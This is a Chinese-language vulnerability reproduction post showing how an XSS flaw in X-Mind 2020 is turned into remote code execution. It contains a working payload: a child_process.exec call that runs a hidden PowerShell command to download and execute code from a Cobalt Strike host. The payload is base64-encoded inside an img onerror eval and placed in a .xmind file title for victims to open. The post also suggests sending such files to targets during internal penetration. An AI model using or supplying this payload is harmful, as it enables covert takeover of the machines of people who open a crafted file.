漏洞复现 | X-Mind XSS致使RCE

第三方软件的漏洞之前也发过一些，以后会总结一下。它们有时候可以在内网渗透中达到意想不到的效果。

仔细想想，在办公区，就算是程序员，都不一定会及时更新相关软件，同时他们过度依赖于公司的监控设备和人员，还有过度相信杀软的安全。这就产生了一定的风险。

0x00 前言

这是一个比较老旧的漏洞了，首发于2021年5月最新版的X-Mind，但是如今内网还是能看到。

Xmind这个漏洞可以以自定义标题的形式存储恶意代码，当受害者点击或修改自定义标题时，恶意代码将被执行。攻击者可以发送带有恶意代码的.xmind文件，当该文件被打开时，攻击者能远程控制计算机。

其实看过这两篇文章的师傅们，很快就会理解下面的复现了。

Clash RCE漏洞复现与高级利用（配合社工）

利用AntSword RCE进行溯源反制黑客

0x01 环境配置

具有该漏洞的X-Mind 2020 (v10.3.1)Win64位安装包下载地址：
https://dl2.xmind.cn/XMind-2020-for-Windows-64bit-10.3.1-202101070032.exe

靶机为windows10机器，关闭杀软(包含Defender)

0x02 本地XSS复现

1、很简单，只需要打开安装好具有漏洞版本的X-Mind，随便选择一个模板。

2、在标题处写上<audio src=x onerror=confirm("test")>

3、然后选择大纲模式编辑这个标题，随便写，甚至我按shift切换一下中英文都会成功弹窗。

0x03 RCE 上线

1、CS生成一句话上线的powershell命令，复制出来。

2、放入下面这段代码的相应位置

require('child_process').exec('powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.31.84:80/a'))"',(error, stdout, stderr)=>{alert(`stdout: ${stdout}`);});

3、将上段代码进行base64加密

cmVxdWlyZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoJ3Bvd2Vyc2hlbGwuZXhlIC1ub3AgLXcgaGlkZGVuIC1jICJJRVggKChuZXctb2JqZWN0IG5ldC53ZWJjbGllbnQpLmRvd25sb2Fkc3RyaW5nKFwnaHR0cDovLzE5Mi4xNjguMzEuODQ6ODAvYVwnKSkiJywoZXJyb3IsIHN0ZG91dCwgc3RkZXJyKT0+ewphbGVydChgc3Rkb3V0OiAke3N0ZG91dH1gKTsgCn0pOw==

4、再放入下面这段代码对应base64加密后的位置

<img src=x onerror='eval(new Buffer(`cmVxdWlyZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoJ3Bvd2Vyc2hlbGwuZXhlIC1ub3AgLXcgaGlkZGVuIC1jICJJRVggKChuZXctb2JqZWN0IG5ldC53ZWJjbGllbnQpLmRvd25sb2Fkc3RyaW5nKFwnaHR0cDovLzE5Mi4xNjguMzEuODQ6ODAvYVwnKSkiJywoZXJyb3IsIHN0ZG91dCwgc3RkZXJyKT0+e2FsZXJ0KGBzdGRvdXQ6ICR7c3Rkb3V0fWApO30pOw==`,`base64`).toString())'>

5、复制出来后直接拼接到一个x-mind文件的标题处

6、点击大纲，切换一下中英文，或者随便输入个字母或者数字就已经上线了

0x04 总结

1、X-Mind软件基于Node.js开发，所以此XSS漏洞和之前复现的Clash、蚁剑漏洞有些类似。

2、第三方软件的漏洞，远比操作系统自带的服务或者软件多得多，而且利用成本更加低。

3、在内网渗透中，我们拿到任意一台机器，不要着急提权或者内网信息收集，先做好本地的信息收集，例如我找到一个.xts文件，如果你要是知道这是X-shell终端工具导出配置的文件后缀，你还用得着费尽心思去搭建路由跨网段进行内网渗透吗？还需要本地导出注册表dumphash然后PTH吗？渗透的成本会大大降低。

4、渗透测试，不仅仅是只用渗透的技巧，拿到对应的机器，就要化身成对应机器的所有者，去扮演他的角色去渗透，如果他的角色不够用了，再加入我们渗透的技巧与思路。所以有时不要一味去追求高级的操作而忘了基础和基本操作。

0x05 references

https://www.jianshu.com/p/4fd4b2f2dfb5